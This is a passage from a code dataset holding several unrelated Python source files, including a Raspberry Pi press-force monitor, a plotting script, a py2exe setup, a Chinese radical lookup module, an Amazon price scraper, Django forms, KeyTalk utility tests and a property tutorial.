Threshold variable, Force List, PF list, excel file path, excel doc title)\r\n\r\nThe sleep.time command at the end is essential for making sure the CPU does run at 100% capacity. Run the htop command in the terminal\r\nto monitor CPU usage and play with this time to get maximum speed without running the CPU at 100%.\r\n'''\r\ndef Press(ch, ser, break_beam_pin, button_pin, LED_pin, tare, thresh, ForceList, PFList, file_path, title):\r\n try:\r\n local_time_init = time.localtime() #Initializing local time\r\n stop_time = int(time.strftime('%H%M%S')) #Initializing cutoff time\r\n while stop_time < 170000:\r\n local_time_init = time.localtime() #Initializing local time\r\n timestmp = time.strftime('%m-%d-%Y_%H%M', local_time_init) #Creating TimeStamp\r\n stop_time = int(time.strftime('%H%M%S')) #Initializing cutoff time\r\n cond = GPIO.input(break_beam_pin)\r\n but = GPIO.input(button_pin)\r\n GPIO.output(LED_pin, 0)\r\n if cond:\r\n ser.write(('W\\r').encode('utf-8'))\r\n ser.flush()\r\n data = float((ser.readline()).decode('utf-8')) - tare\r\n ForceList.append(data)\r\n if data >= thresh:\r\n print('%.4f' % data + ' lbs')\r\n print(str(title) + ' :Pass')\r\n print('')\r\n PFList.append('Pass')\r\n time.sleep(ShortSleep)\r\n elif data < thresh:\r\n print('%.4f' % data + ' lbs')\r\n print(str(title) + ' :Fail')\r\n print('')\r\n GPIO.output(LED_pin, 1)\r\n PFList.append('Fail')\r\n time.sleep(LongSleep)\r\n GPIO.output(LED_pin, 0)\r\n if but or stop_time == (165000 + (ch*2)):\r\n print('Exporting ' + str(title) + ' data to Excel...')\r\n Export_Indicator(LED_pin)\r\n Excel(ForceList, PFList, file_path + str(title) + '_' + str(timestmp) + '.xlsx', title)\r\n time.sleep(0.001)\r\n except KeyboardInterrupt:\r\n pass\r\n\r\n#Automatic shutdown at the end of the workday (5PM) as well as initializing the GPIO and serial ports and exporting daily data to excel\r\ndef ShutDown():\r\n ser1.close()\r\n ser2.close()\r\n ser3.close()\r\n ser4.close()\r\n GPIO.cleanup()\r\n os.system('sudo shutdown now')\r\n\r\n#Start up indicator\r\nfor i in OUTPUTS:\r\n GPIO.output(i, 1)\r\ntime.sleep(10)\r\nfor i in OUTPUTS:\r\n GPIO.output(i, 0)\r\n\r\n'''\r\nMain while loop. Will run until 5:00PM EST then end loop and proceed to shutdown.\r\nAdd a new press by passing Press(a, b1, b2, b3, c, d, e, f, g) with the appropriate values.\r\nThe multiproccessing package allows the press function with it's respective arguments to run on it's\r\nown core. This lets all 4 cells run simultaneously without interferring with eachother. \r\n\r\nPLEASE READ:\r\nThe file path points only to the folder where the file will be saved. The file name is built on export by \r\nthe press function!\r\n'''\r\nif __name__ == '__main__':\r\n p1 = Process(target = Press, args = (0, ser1, 12, 11, 31, init1, Thresh1, Force1, PF1, \"/home/pi/EEC_Network/RPi1/Press 1 - Reflector + Body/\", 'Press 1'))\r\n p2 = Process(target = Press, args = (1, ser2, 16, 13, 33, init2, Thresh2, Force2, PF2, \"/home/pi/EEC_Network/RPi1/Press 2 - Contact Ring + Body/\", 'Press 2'))\r\n p3 = Process(target = Press, args = (2, ser3, 18, 15, 35, init3, Thresh3, Force3, PF3, \"/home/pi/EEC_Network/RPi1/Press 3 - Endcap Pins + Endcap/\", 'Press 3'))\r\n p4 = Process(target = Press, args = (3, ser4, 22, 19, 37, init4, Thresh4, Force4, PF4, \"/home/pi/EEC_Network/RPi1/Press 4 - Tape Switch Pins + Tape Switch Body/\", 'Press 4'))\r\n p1.start()\r\n p2.start()\r\n p3.start()\r\n p4.start()\r\n p1.join()\r\n p2.join()\r\n p3.join()\r\n p4.join()\r\n\r\n#Call Shutdown Function\r\n#ShutDown()\r\n","sub_path":"OLD_SCRIPTS/pressMonitor_FirstAttempt.py","file_name":"pressMonitor_FirstAttempt.py","file_ext":"py","file_size_in_byte":10379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"84797013","text":"\"\"\"\nanalysis\n\n\"\"\"\nimport figsetup_exp_branch_sequence as figsetup\nimport numpy as np\nimport analysis\nimport glob\nimport pickle\nimport copy\nimport matplotlib.pyplot as plt\nimport itertools\nfrom matplotlib import cm as colormap\nfrom scipy import stats\nimport os\nimport functions as fncs\n\ndata_local = False\nexperiment='_'.join(__name__.split('_')[1:]).split('.')[0]\n# kwargs = {'experiment':'_'.join(__name__.split('_')[1:]).split('.')[0]}\ndpi=350\n\n#############################################################################\n# directories and filenames\n#############################################################################\n# directories\ndata_directory = 'Data/'\nif data_local:\n data_directory='Data local/'\ndirectory = data_directory+experiment+'/'\nfigure_directory = directory+'Figures/'\n# make figure directory if doesnt exist\nif os.path.isdir(figure_directory) is False:\n os.mkdir(figure_directory)\n\n# variables to load\nvariables = ['vtrace_df',]\nvariables_reload=['vtrace_df']\n\narrayfuncs = fncs.ArrayFunctions()\ndffuncs = fncs.DfFuncs()\n\n#############################################################################\n# load variables\n#############################################################################\n_g = globals()\ndef _load_variables(variables, global_variables=globals(), variables_reload=[], extension='.pkl'):\n '''\n '''\n for variable in variables:\n # check if exists\n exists = variable in globals()\n if (variable in variables_reload) or not exists :\n filename = variable\n _g[variable]=fncs._load_group_data(directory=directory, filename=filename)\n_load_variables(variables=variables, global_variables=_g, variables_reload=variables_reload)\n\n#####################################################################\n# average voltage trace, weak path dendrites in paired vs unpaired\n#####################################################################\ndef _vtrace_mean(vtrace_df=vtrace_df, figsetup=figsetup):\n # plot average voltage trace at soma and dendrite\n #------------------------------------------------\n figtype='vtrace_soma_mean_'\n figdf=figsetup.BuildFigDF()._trace_mean()\n\n # create column for sec_idx string to sort by which section was stimulated\n vtrace_df = dffuncs._to_string(vtrace_df, colnames=['path_1_sec_idx'])\n\n # truncate arrays to have same length for same sequence delay\n vtrace_df = vtrace_df.set_index(['Cm', 'path_1_syn_limit','path_1_nmda_ampa_ratio','branch_seg_L','path_1_delay', 'path_1_w_mean', 'path_1_sequence_direction', 'field', 'tree_key', 'path_1_sec_idx_str', 'seg_num'])\n # # vtrace_df = dffuncs._truncate_arrays(df=vtrace_df,)\n\n # vtrace_df['data_v'] = dffuncs._truncate_arrays(vtrace_df['data_v'])\n # figdf['fig_ymin']=-4\n # figdf['fig_dyticks']=1\n # figdf['fig_xmin']=0\n # figdf['fig_xmax']=60\n # vtrace_df['path'] = vtrace_df['path'].fillna('2')\n # vtrace_df = vtrace_df.set_index(['path_1_syn_num','field', 'tree', ])\n kwargs={'dt':1./40}\n array_funcs = [arrayfuncs._truncate_array]#[arrayfuncs._subtract_timeseries]\n array_funcs=[]\n array_func_kws = [{}]#[{'islice':slice(399, 400), 'axis':1}]\n figs, ax = fncs.PlotFuncs()._trace_mean(df=vtrace_df, figdf=figdf, variables='data_v',array_funcs=array_funcs, array_func_kws=array_func_kws, figformat='none', **kwargs) \n vtrace_df = vtrace_df.reset_index()\n # save figure\n #------------\n for fig_key, fig in figs.iteritems():\n fname = figure_directory+figtype+str(fig_key)+'.png'\n fig.savefig(fname, format='png', dpi=dpi) \n return figs, ax, vtrace_df, figdf\n\nfigs, ax, vtrace_df, figdf= _vtrace_mean()","sub_path":"analysis_exp_branch_sequence.py","file_name":"analysis_exp_branch_sequence.py","file_ext":"py","file_size_in_byte":3672,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"19234515","text":"from distutils.core import setup\r\nimport py2exe\r\nimport os\r\n\r\n\"\"\" list of data_files to pass to setup \"\"\"\r\nfiles = []\r\n\r\n\"\"\" list of directories to search for files \"\"\"\r\ndirs = ['.\\\\resources\\\\flags',\r\n '.\\\\resources\\\\icons',\r\n '.\\\\resources\\\\images',\r\n '.\\\\resources\\\\styles',\r\n '.\\\\resources\\\\translations']\r\n\r\n\"\"\" loop through the list of directiories and create data_file entries \"\"\"\r\nfor dirpath, dirnames, filenames in os.walk('.'): \r\n if dirpath in dirs:\r\n for filename in filenames:\r\n filepath = dirpath + '\\\\' + filename\r\n fileEntry = (dirpath, [filepath]) \r\n files.append(fileEntry)\r\n\r\n\"\"\" static entries go here\"\"\" \r\nfiles.append(('.', ['.\\\\config.ini']))\r\n\r\n\"\"\" build setup \"\"\"\r\nsetup(\r\n name=\"EUROBet 2016\",\r\n version=\"01.00.00\",\r\n description=\"A betting application for the sake of fun and brotherhood\",\r\n author=\"sza2mc\",\r\n windows=[{\"script\" : \"EUROBet2016.py\"}],\r\n data_files = files,\r\n options={\r\n \"py2exe\" : {\r\n \"dist_dir\" : \".\\\\bin\",\r\n \"includes\" : [\"sip\", \"pymssql\", \"_mssql\", \"decimal\", \"uuid\"],\r\n \"packages\" : [\"pymssql\", \"_mssql\"],\r\n \"dll_excludes\" : [\"MSVCP90.dll\"],\r\n \"bundle_files\" : 1,\r\n \"compressed\" : True\r\n }\r\n },\r\n zipfile = None\r\n )\r\n\r\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"508485394","text":"import aineural as ai\r\nfrom enum import Enum\r\n\r\ndef test_simple_feedforward_network():\r\n # low level neural net creation\r\n net = ai.NeuralNet()\r\n net.set_seed(101)\r\n net.add_input( id=0, value_type=int, range=[0,1])\r\n net.add_input( id=1, value_type=int, range=[0,1])\r\n net.add_node( id=2, inputs=[0,1], weights=None, bias=1.0)\r\n net.add_node( id=3, inputs=[0,1], weights=None, bias=1.0)\r\n net.add_output( id=4, inputs=[2,3], weights=None, value_type=int, range=[0,1], bias=1.0)\r\n print(net.describe())\r\n net.save('test.nn')\r\n\r\n net2 = ai.NeuralNet.load('test.nn')\r\n print(net2.describe())\r\n\r\n out = net.out([0,1])\r\n\r\n '''\r\n print(out)\r\n\r\n # load the neural net, result should be the same\r\n out2 = net2.out([0, 1])\r\n print(out2)\r\n\r\n # create same type of neural network using higher level functions\r\n net3 = ai.NeuralNet()\r\n net3.create_feed_forward(inputs=[2,int,[0,1]], outputs=[1,int,[0,1]], hidden_layers=[2], seed=101, bias=1.0)\r\n out3 = net3.out([0, 1])\r\n print(out3)\r\n\r\n # create a new environment\r\n env = ai.Env()\r\n inputs = [[0,0],[0,1],[1,0],[0,0]]\r\n env.create_classification_env(inputs=inputs, outputs=[[0],[1],[1],[0]])\r\n\r\n # train the neural network on that environment\r\n tr = NeuralNetTrainer()\r\n [winners, errors] = tr.train_by_evolution(env, initial_population=[net3], epochs=1000)\r\n print(winners[0].out(inputs))\r\n '''\r\n\r\nif __name__ == \"__main__\":\r\n test_simple_feedforward_network()\r\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1642,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"498973866","text":"# -*- coding: utf-8 -*-\n\nimport sys\n\npy = sys.version_info\npy3k = py >= (3, 0, 0)\n\nuni_list = []\nradicial_list = ('一一丨丶丿乙亅二亠人儿入八冂冖冫几'\n '凵刀力勹匕匚匸十卜卩厂厶又口囗土士夂夊夕大女子宀寸���'\n '尢尸屮山巛工己巾干幺广廴廾弋弓彐彡彳心戈戶手支攴文斗'\n '斤方无日曰月木欠止歹殳毋比毛氏气水火爪父爻爿片牙牛犬'\n '玄玉瓜瓦甘生用田疋疒癶白皮皿目矛矢石示禸禾穴立竹米糸'\n '缶网羊羽老而耒耳聿肉臣自至臼舌舛舟艮色艸虍虫血行衣襾'\n '見角言谷豆豕豸貝赤走足身車辛辰辵邑酉釆里金長門阜隶隹'\n '雨靑非面革韋韭音頁風飛食首香馬骨高髟鬥鬯鬲鬼魚鳥鹵鹿'\n '麥麻黃黍黑黹黽鼎鼓鼠鼻齊齒龍龜龠')\n\nif py3k:\n import pyunihan.database\n radicial_list = list(radicial_list)\nelse:\n import database\n radicial_list = list(radicial_list.decode('utf-8'))\n\ndef init():\n global uni_list\n if py3k:\n uni_list = pyunihan.database.uni_list\n else:\n uni_list = database.uni_list\n\ndef init_old():\n global uni_list\n fi = open(\"database\", \"r\").readlines()\n uni_list = {}\n \n for i in fi:\n i = i.strip(\"\\n\").split(\" \")\n uni_list[int(i[0][2:], 16)] = [\n radicial_list[int(i[2][:i[2].find(\".\")].replace(\"'\", \"\"))], i[1], i[2]]\n \n open(\"database.py\", \"w\").write(\"uni_list=%s\" % repr(uni_list))\n \ndef get_radical(char):\n \"\"\"Return chinese charater redical, TotalStrokes, RSUnicode\n *RSUnicode: Radical-Stroke Counts\n \n >>> init()\n >>> get_radical(\"我\")\n ['戈', '7', '62.3']\n \"\"\"\n if py3k:\n if not isinstance(char, str):\n char = char.decode('utf-8')\n else:\n if not isinstance(char, unicode):\n char = char.decode('utf-8')\n \n char = ord(char)\n return uni_list[char]\n \nif __name__ == '__main__':\n import time\n t = time.time()\n print(get_radical(\"我\"))\n print(get_radical(\"豺\"))\n print(time.time() - t)","sub_path":"pyunihan.py","file_name":"pyunihan.py","file_ext":"py","file_size_in_byte":2072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"108091083","text":"from bs4 import BeautifulSoup\nfrom enums.enums import Stock, Status\nfrom helpers.redis_helper import RedisHelper\nfrom helpers.smtp_helper import *\nimport requests, json, re\nimport redis\n\nclass BaseHelper:\n\n def __init__(self):\n self.config = self._loadConfig()\n self.redis = RedisHelper()\n\n # Load data from config\n def _loadConfig(self):\n print(\"\\n ==> LOAD DATA FROM CONFIG \")\n with open('./config.json', 'r') as configJson:\n config = json.load(configJson)\n print(\"Loaded data from config...\")\n return config\n\n # Make request\n def makeRequest(self):\n print(\"\\n ==> MAKE REQUEST TO AMAZON \")\n URL = self.config[\"base_url\"]\n # To get user agent simply search my user agent in google\n headers = {\"User-Agent\": self.config[\"user_agent\"]}\n page = requests.get(URL, headers=headers)\n soup = BeautifulSoup(page.content, 'html.parser')\n print(\"Request successfully made to amazon...\")\n return soup\n\n # Get product title\n def getProductTitle(self, soup):\n print(\"\\n ==> GET PRODUCT TITLE \") \n title = str(soup.find(id=self.config[\"elements\"][\"product_title\"][\"target_value\"])\n .get_text()).replace(\"\\s\", \"\")\n print(\"Product title : \"+title)\n return title\n\n # Get product stock\n def getProductStock(self, soup):\n print(\"\\n ==> GET PRODUCT STOCK \")\n stock_text = str(re.search('[^\\s][a-zA-Z\\s]{7,30}', \n soup.find(id=self.config[\"elements\"][\"stock_text\"][\"target_value\"]).get_text())\n .group(0).replace('.', '')).replace(\" \", \"\")\n print(\"Product Stock : \"+stock_text)\n return stock_text\n\n # Get product price\n def getProductPrice(self, soup):\n print(\"\\n ==> GET PRODUCT PRICE \")\n # price_text = price_text.encode('ascii','ignore')\n price = str(re.search('[\\d,.]{1,9}[^\\s]', \n soup.find(id=self.config[\"elements\"][\"price_text\"][\"target_value\"]).get_text())\n .group(0).replace(\",\", \"\"))\n print(\"Product Price : \"+price) \n return float(price)\n\n # Get product price to cache\n def _getProductPrice(self, currentProductPrice):\n oldProductPrice = self.redis.getData(\"product_price\")\n if(oldProductPrice == None):\n self.redis.setDataWithExp(\"product_price\", currentProductPrice, 60*3)\n return currentProductPrice\n else:\n return float(oldProductPrice)\n\n # Get product price from cache and compare price\n def getAndComparePrice(self, currentProductPrice):\n oldProductPrice = self._getProductPrice(currentProductPrice)\n if(currentProductPrice < oldProductPrice):\n print(\"Success!! Price decrease observed. Its a good time to order :)\")\n return Status.SUCCESS\n else:\n print(\"Price still seems to be up :( ... Not a good time to order\")\n return Status.FAILURE","sub_path":"helpers/base_helper.py","file_name":"base_helper.py","file_ext":"py","file_size_in_byte":2982,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"19612082","text":"from itertools import combinations\n\n# enter word\nL = input()\n# enter the number of characters you want\nK = int(input())\n\nC = list(combinations(L, K))\nprint(C)\n\n# only puts the items with letter a on it in F\n# how it works: item in C is sent to c.\n# then checks if 'a' is in c.\n# it returns true if it is found.\nF = list(filter(lambda c: 'a' in c, C))\nprint(F)","sub_path":"Python/Hackerrank/Built-in Functions/Combinations2.py","file_name":"Combinations2.py","file_ext":"py","file_size_in_byte":387,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"246711632","text":"from django import forms\nfrom django.forms import ModelForm\nfrom django.contrib.auth.forms import UserCreationForm\nfrom django.contrib.auth.forms import User\nfrom .models import Cart,Orders\n\n\nclass UserRegistrationForm(UserCreationForm):\n class Meta:\n model=User\n fields=[\"username\",\"password1\",\"password2\",\"email\"]\n\nclass CartForm(ModelForm):\n class Meta:\n model=Cart\n fields='__all__'\n widgets = {\n 'product': forms.Select(attrs={'class': 'text_inp', 'placeholder': 'Product'}),\n 'user': forms.TextInput(attrs={'class': 'text_inp', 'placeholder': 'User'}),\n 'quantity': forms.TextInput(attrs={'class': 'text_inp', 'placeholder': 'Quantity'}),\n }\n\nclass OrderForm(ModelForm):\n class Meta:\n model=Orders\n fields=['address','product','user']\n widgets = {\n 'address': forms.TextInput(attrs={'class': 'text_inp', 'placeholder': 'Address'}),\n 'product': forms.Select(attrs={'class': 'text_inp', 'placeholder': 'Product'}),\n 'user': forms.TextInput(attrs={'class': 'text_inp', 'placeholder': 'User'})\n\n\n }","sub_path":"customers/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1145,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"125524766","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport sys\nimport unittest\nimport os\nimport time\nimport datetime\nimport uuid\n\nsys.path.insert(0, '/usr/local/bin/keytalk')\nimport util\n\n\nclass TestUtil(unittest.TestCase):\n\n def test_run_cmd_with_success(self):\n self.assertEquals(util.run_cmd('pwd'), os.getcwd())\n\n def test_run_cmd_with_error(self):\n self.assertRaises(Exception, util.run_cmd, 'nonexistent_command')\n\n def test_strip_json_comments(self):\n json_with_comments = '''\n [\n # number one\n 'first',\n // number two\n 2,\n \"three\"\n ]\n '''\n expected_json = '''\n [\n\n 'first',\n\n 2,\n \"three\"\n ]\n '''\n self.assertEquals(util.strip_json_comments(json_with_comments), expected_json)\n\n def test_parse_certs_with_success(self):\n self.assertEquals(len(util.parse_certs('3certs.pem')), 3)\n self.assertEquals(len(util.parse_certs('2certs1key.pem')), 2)\n\n def test_parse_certs_with_error(self):\n self.assertEquals(util.parse_certs('/non/existing/file/name'), [])\n self.assertEquals(util.parse_certs('3privkeys.pem'), [])\n\n def test_parse_keys_with_success(self):\n self.assertEquals(len(util.parse_keys('3privkeys.pem')), 3)\n self.assertEquals(len(util.parse_keys('2certs1key.pem')), 1)\n\n def test_parse_keys_with_error(self):\n self.assertEquals(util.parse_keys('/non/existing/file/name'), [])\n self.assertEquals(util.parse_keys('3certs.pem'), [])\n\n def test_same_file_with_success(self):\n # same file\n self.assertTrue(util.same_file(\"/etc/keytalk/apache.ini\", \"/etc/keytalk/apache.ini\"))\n # whitespace\n self.assertTrue(\n util.same_file(\"/etc/keytalk/apache.ini \", \" /etc/keytalk/apache.ini \"))\n # symlink\n os.system(\"ln -sf /etc/keytalk/apache.ini /tmp/apache-slink.ini\")\n self.assertTrue(util.same_file(\"/etc/keytalk/apache.ini\", \"/tmp/apache-slink.ini\"))\n # hardlink\n os.system(\"ln -f /etc/keytalk/apache.ini /tmp/apache-hlink.ini\")\n self.assertTrue(util.same_file(\"/etc/keytalk/apache.ini\", \"/tmp/apache-hlink.ini\"))\n\n def test_same_file_with_error(self):\n # different files\n self.assertFalse(util.same_file(\"/etc/keytalk/apache.ini\", \"/etc/keytalk/resept.ini\"))\n # different files (though same contents)\n os.system(\"cp -f /etc/keytalk/apache.ini /tmp/apache.ini\")\n self.assertFalse(util.same_file(\"/etc/keytalk/apache.ini\", \"/tmp/apache.ini\"))\n # directory\n self.assertFalse(util.same_file(\"/etc/keytalk/\", \"/etc/keytalk/\"))\n # not a file\n self.assertFalse(util.same_file(\"\", \"\"))\n\n def test_get_cert_validity_percentage_with_success(self):\n self.assertEqual(util.get_cert_validity_percentage(\n \"DemoProvider\", \"CUST_PASSWD_INTERNAL\"), 10)\n\n def test_get_cert_validity_percentage_with_error(self):\n self.assertRaises(\n Exception,\n util.get_cert_validity_percentage,\n \"DemoProvider\",\n \"invalid-service\")\n self.assertRaises(\n Exception,\n util.get_cert_validity_percentage,\n \"invalid-provider\",\n \"CUST_PASSWD_INTERNAL\")\n\n def test_get_keytalk_providers(self):\n self.assertEqual(util.get_keytalk_providers(), ['DemoProvider'])\n\n def test_get_keytalk_services(self):\n demo_provider_services = [\"CUST_PASSWD_INTERNAL\",\n \"CUST_CR_MYSQL\",\n \"CUST_ANO_INTERNAL_TESTUI\",\n ]\n self.assertEqual(\n sorted(\n util.get_keytalk_services('DemoProvider')),\n sorted(demo_provider_services))\n\n def test_censor_string(self):\n self.assertEqual(\n util.censor_string(\n 'Some secret text with lots of secrets',\n ['secret']),\n 'Some text with lots of s')\n self.assertEqual(util.censor_string('Some secret text with lots of hidden secrets', [\n 'secret', 'hidden']), 'Some text with lots of s')\n self.assertEqual(\n util.censor_string(\n 'Some !@#$%^&*()\\\\/ text with lots of !@#$%^&*()\\\\/s',\n ['!@#$%^&*()\\\\/']),\n 'Some text with lots of s')\n\n def test_populate_defaults(self):\n # given\n known_settings = {'VHost': {'required': True,\n 'dependencies': []},\n\n 'ServerName': {'required': False,\n 'dependencies': []},\n\n 'EmailNotifications': {'required': False,\n 'dependencies': [],\n 'default_value': False},\n\n 'EmailSubject': {'required': False,\n 'dependencies': ['EmailNotifications'],\n 'default_value': 'Apache certificate renewal'},\n\n 'EmailSubjectPostfix': {'required': False,\n 'dependencies': ['EmailSubject'],\n 'default_value': 'some_postfix'}}\n\n # whens/thens\n settings_dict = util.populate_defaults({}, known_settings)\n self.assertEquals(settings_dict, {'VHost': None,\n 'ServerName': None,\n 'EmailNotifications': False,\n 'EmailSubject': None,\n 'EmailSubjectPostfix': None})\n\n settings_dict = util.populate_defaults({'EmailNotifications': True}, known_settings)\n self.assertEquals(settings_dict, {'VHost': None,\n 'ServerName': None,\n 'EmailNotifications': True,\n 'EmailSubject': 'Apache certificate renewal',\n 'EmailSubjectPostfix': None})\n\n settings_dict = util.populate_defaults(\n {'EmailNotifications': True, 'EmailSubject': 'Some subject'}, known_settings)\n self.assertEquals(settings_dict, {'VHost': None,\n 'ServerName': None,\n 'EmailNotifications': True,\n 'EmailSubject': 'Some subject',\n 'EmailSubjectPostfix': 'some_postfix'})\n\n def test_validate_setting_dependencies(self):\n # given\n known_settings = {'Required': {'required': True,\n 'dependencies': []},\n\n 'Optional': {'required': False,\n 'dependencies': []},\n\n 'RequiredWithDependency': {'required': True,\n 'dependencies': ['Optional']},\n\n 'OptionalWithDependency': {'required': False,\n 'dependencies': ['Optional']}}\n # whens/thens\n errors = util.validate_setting_dependencies(\n {\n 'Required': 'value',\n 'Optional': 'value2',\n 'RequiredWithDependency': 'value3',\n 'OptionalWithDependency': 'value4'},\n known_settings)\n self.assertEqual(errors, [])\n\n errors = util.validate_setting_dependencies({'Required': 'value'}, known_settings)\n self.assertEqual(errors, [])\n\n errors = util.validate_setting_dependencies(\n {'Required': 'value', 'Optional': 'value2', 'RequiredWithDependency': 'value3'}, known_settings)\n self.assertEqual(errors, [])\n\n errors = util.validate_setting_dependencies({}, known_settings)\n self.assertEqual(errors, ['Required setting \"Required\" not found.'])\n\n errors = util.validate_setting_dependencies(\n {'Required': 'value', 'Optional': 'value2'}, known_settings)\n self.assertEqual(\n errors,\n ['The current configuration requires setting \"RequiredWithDependency\".'])\n\n def test_parse_settings(self):\n known_settings = {\n 'Required': {\n 'required': True,\n 'dependencies': [],\n 'default_value': 'not_used_since_required'},\n 'Optional': {\n 'required': False,\n 'dependencies': [],\n 'default_value': 'optional_default'},\n 'RequiredWithDependency': {\n 'required': True,\n 'dependencies': ['Optional'],\n 'default_value': 'not_used_since_required'},\n 'OptionalWithDependency': {\n 'required': False,\n 'dependencies': ['Optional']},\n 'OptionalWithDependency2': {\n 'required': False,\n 'dependencies': ['OptionalWithDependency'],\n 'default_value': 'optional_with_dependency_2_default'}}\n\n # whens/thens\n settings, errors = util.parse_settings({'Required': 'value', 'Optional': 'value2', 'RequiredWithDependency': 'value3',\n 'OptionalWithDependency': 'value4', 'OptionalWithDependency2': 'value5'}, known_settings)\n self.assertEqual(errors, [])\n self.assertEquals(settings, {'Required': 'value',\n 'Optional': 'value2',\n 'RequiredWithDependency': 'value3',\n 'OptionalWithDependency': 'value4',\n 'OptionalWithDependency2': 'value5'})\n\n settings, errors = util.parse_settings({'Required': 'value'}, known_settings)\n self.assertEqual(errors, [])\n self.assertEquals(settings, {'Required': 'value',\n 'Optional': 'optional_default',\n 'RequiredWithDependency': None,\n 'OptionalWithDependency': None,\n 'OptionalWithDependency2': None})\n\n settings, errors = util.parse_settings(\n {'Required': 'value', 'Optional': 'value2', 'RequiredWithDependency': 'value3'}, known_settings)\n self.assertEqual(errors, [])\n self.assertEquals(settings, {'Required': 'value',\n 'Optional': 'value2',\n 'RequiredWithDependency': 'value3',\n 'OptionalWithDependency': None,\n 'OptionalWithDependency2': None})\n\n settings, errors = util.parse_settings(\n {'Required': 'value', 'Optional': 'value2', 'RequiredWithDependency': 'value3', 'OptionalWithDependency': 'value4'}, known_settings)\n self.assertEqual(errors, [])\n self.assertEquals(settings,\n {'Required': 'value',\n 'Optional': 'value2',\n 'RequiredWithDependency': 'value3',\n 'OptionalWithDependency': 'value4',\n 'OptionalWithDependency2': 'optional_with_dependency_2_default'})\n\n settings, errors = util.parse_settings({}, known_settings)\n self.assertEqual(errors, ['Required setting \"Required\" not found.'])\n self.assertEquals(settings, None)\n\n settings, errors = util.parse_settings(\n {'Required': 'value', 'Optional': 'value2'}, known_settings)\n self.assertEqual(\n errors,\n ['The current configuration requires setting \"RequiredWithDependency\".'])\n self.assertEquals(settings, None)\n\n settings, errors = util.parse_settings(\n {'Required': 'value', 'Optional': 'value2', 'RequiredWithDependency': 'value3',\n 'OptionalWithDependency': 'value4', 'OptionalWithDependency2': 'value5', 'UnknownSetting': 'value6'}, known_settings)\n self.assertEqual(len(errors), 1)\n self.assertRegexpMatches(errors[0], 'Unknown setting \"UnknownSetting\" encountered')\n self.assertEquals(settings, None)\n\n def test_email(self):\n # given\n mailbox_dir = '/var/mail'\n random_string = str(uuid.uuid4())\n subject = 'Test Mail ' + random_string\n msg_body = 'Message body: ' + random_string\n attachments = [('attachment1-name-' + random_string, 'attachment1-body'),\n ('attachment2-name-' + random_string, 'attachment2-body')]\n # when\n util.send_email(\n smtp_server_addr='localhost',\n sender='root@localhost',\n recipients=['root@localhost'],\n subject=subject,\n message=msg_body,\n attachments=attachments)\n\n # then\n time.sleep(2)\n self.assertTrue(os.listdir(mailbox_dir))\n mailbox_file_name = util.run_cmd('ls -Art /var/mail| tail -n 1')\n mail_file = mailbox_dir + '/' + mailbox_file_name\n mails = open(mail_file).read()\n\n self.assertTrue('From: root@localhost' in mails)\n self.assertTrue('To: root@localhost' in mails)\n self.assertTrue('Subject: ' + subject in mails)\n self.assertTrue(msg_body in mails)\n self.assertTrue('filename=\\\\\"{}\\\\\"\";'.format(attachments[0][0]) in mails)\n self.assertTrue('filename=\\\\\"{}\\\\\"\";'.format(attachments[1][0]) in mails)\n\n def test_is_backup_file_path(self):\n self.assertFalse(util.is_backup_file_path('/home/me/some-file_path'))\n self.assertFalse(util.is_backup_file_path('some-file_path'))\n self.assertFalse(util.is_backup_file_path('some-file_path.orig'))\n self.assertFalse(util.is_backup_file_path('some-file_path.orig.'))\n self.assertFalse(util.is_backup_file_path('some-file_path.orig.something-something'))\n self.assertTrue(util.is_backup_file_path('some-file_path.orig.1-2'))\n self.assertTrue(util.is_backup_file_path('some-file_path.orig.0000-0000'))\n self.assertTrue(util.is_backup_file_path('some-file_path.orig.20150928-140919'))\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"Software/Client/TestProjects/testReseptInstaller/linux/apache/util_test.py","file_name":"util_test.py","file_ext":"py","file_size_in_byte":14533,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"423937266","text":"class Person:\n def __init__(self, firstname, lastname):\n self.firstname = firstname\n self.lastname = lastname\n\n @property\n def fullname(self):\n return self.firstname + \" \" + self.lastname\n\n @fullname.setter\n def fullname(self, value):\n self.firstname, self.lastname = value.split(\" \", 1)\n\n @fullname.deleter\n def fullname(self):\n self.firstname = \"\"\n self.lastname = \"\"\n\nprint(\"*** Person Class instance initiated using var: A ***\")\nA = Person(\"Ravi\", \"Raja\")\nprint(\"What is A:\", A)\n\nprint(A.firstname)\nprint(A.lastname)\nprint(A.fullname)\n\nprint(\"Updating first & lastname\")\nA.firstname = \"Ravi Raja\"\nA.lastname = \"Koineni\"\n\nprint(A.fullname)\nA.fullname = \"Ravi Raja K\"\nprint(A.fullname)\ndel A.fullname\nprint(\"Called deleter fullname:\", A.fullname)\nprint(\"=====END=======\")\n\n# In Python, prefixing a member variable by a single underscore signals the variable is non-public,\n# i.e. it should only be accessed internally, inside methods of that class, or its subclasses.[1]\n# What this pattern says is \"you can access this variable, but not change it\".\n\nclass Ticket:\n def __init__(self, price): #### Default Constructor\n if price < 0:\n raise ValueError(\"Use Valid Positive Value to Price\", price)\n self.price = price\n\n @property\n def price(self):\n return self._price ### prefixing a member variable by a single underscore signals the variable is non-public\n\n @price.setter\n def price(self, price):\n # Only allow positive prices.\n print(\"new_price is\", price)\n if price < 0:\n raise ValueError(\"Use Valid Positive Value to Price\", price)\n self._price = price\n\n def update_price(self, new_price):\n # Only allow positive prices.\n print(\"Price Changed: -> \", new_price)\n if new_price < 